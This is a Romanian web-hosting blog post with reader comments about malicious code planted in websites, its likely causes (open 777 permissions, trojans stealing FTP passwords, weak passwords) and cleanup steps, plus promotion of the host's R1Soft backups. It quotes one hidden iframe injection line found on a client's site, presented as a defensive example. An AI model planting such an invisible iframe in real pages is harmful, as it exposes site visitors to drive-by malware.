Virusi sau cod malitios in site-ul dumneavoastra?

Ati descoperit fisiere in site-ul dvs. care  contin virusi sau linkuri malitioase ?

Fisierele dvs. pot fi modificate, fara stirea dvs. numai din urmatoarele cauze :

1) permisiuni de tipul 777 directoarelor sau fisierelor din cont, astfel incat au putut fi accesate si modificate din exterior. 777 reprezinta  acces de citire, scriere si executie pentru oricine ;

2) calculatorul dvs ori cel care face upload la continutul site-ului au fost virusate, virusi care in ultima vreme copiaza parolele si ca urmare incarca continutul malitios direct de pe calculatorul in cauza si/sau parola de ftp este folosita de atacator de pe alte site-uri pentru a modifica fisierele siteului si a insera linkuri malitioase ;

3) parola dvs.  pentru contul de ftp a fost prea simpla si a fost „ghicita” de softurile de scanare si folosita ulterior pentru a modifica fisierele din site .

De obicei codul malitios este un link de tipul :

<iframe src=”http://numesite.tld:8080/ts/in.cgi?pepsi116″ width=125 height=125 style=”visibility: hidden”></iframe>

Acesta este chiar un exemplu de cod gasit in site-urile unui client. Cauza a fost, cel mai probabil virusarea calculatorului dupa care s-a efectuat uploadul.

Ce putem face in acest caz ?

1) contactati programatorul care se ocupa de site-ul dvs si solicitati-i sa revizuiasca siteul si mai ales permisiunile ;

2) verificati calculatorul de virusi si troieni posibil instalati. Dupa devirusare schimbati parolele contului de gazduire (va recomandam achizitionarea unei solutii antivirus) ;

3) uploadati din nou fisiere necorupte ale siteului folosind solutia de la R1Soft din Cpanel-ul dvs . Deasemenea, puteti urca site-ul direct dupa computerul dvs. daca sunteti sigur ca acesta nu este virusat .

Pentru orice problema de acest gen, in cazul in care dvs. nu va descurcati, nu ezitati sa ne contactati .

You can skip to the end and leave a response. Pinging is currently not allowed.

5 Comentarii la “Virusi sau cod malitios in site-ul dumneavoastra?”

  1. Adrian_B67 spune:

    Pot sa spun ca am gasit o asemenea insertie de cod acum ceva timp in unul din bloguri. Solutia pe care am adoptat-o si o recomand este urmatoarea :

    1. Devirusare computer, dar cel mai sigur FORMAT si Reinstall OS.
    2. Schimbare parole Cpanel si implicit FTP MySQL and stuff.
    3. Upload din nou la site, dar cel mai sigur si aici, luati legatura cu hosterul pentru o copie din backup-ul dupa server(aici vad ca se foloseste R1Soft ceea ce este minunat).

    Recomand de asemenea shcimbarea parolelor macar lunar.

  2. Gabi t spune:

    Am avut acum ceva timp probleme cu un virus care printre altele a trimis si informatiile salvate in clientul meu de FTP, CuteFTP. Este vorba de un fisier .exe (C:\Documents and Settings\tgabi\Start Menu\Programs\Startup\ikowin32.exe) .AVG-ul nu l-a scos, am incercat Kaspersky cu care am reusit sa-l elimin in prima faza, dar se pare ca virusul ramasese rezident in calculator, si continua sa trimita informatii catre persoane(computere) rau voitoare. Recomand, ceea ce am facut si eu de altfel, FORMATAREA si Reinstalarea SO-ului.

  3. MIHAI spune:

    Nu salvati parole de FTP, Cpanel, Mail, etc pe calculatoare straine si care nu prezinta siguranta. Asigurati-va ca aveti instalat pe calculatorul dumneavoastra o solutie antivirus cu licenta si actualizata la zi.

  4. andrei07d spune:

    M-am pricopsit de curand cu un „ikowin.exe”. Singura solutie a fost formatarea PC-ului. Norocul meu ca aveam o copie la site facuta cu cateva zile inainte.
    Hosterul la care am site-ul se lauda ca face backup zilnic. Cand am cerut o copie a site-ului mi-a spus ca nu se poate pentru ca au probleme cu server-ul de backup cica.
    As dori sa stiu daca la voi, la TLH exista o solutie sigura de backup. Ma bate gandul sa imi mut gazduirea site-ului in alta parte.

  5. MIHAI spune:

    @andrei07d
    Da, avem solutie profesionala de backup de la R1Soft. Backup-ul se realizeaza zilnic, cate 2 instante de backup, cu posibilitatea de Restore din Cpanelul fiecarui client.


Lasa un comentariu la MIHAI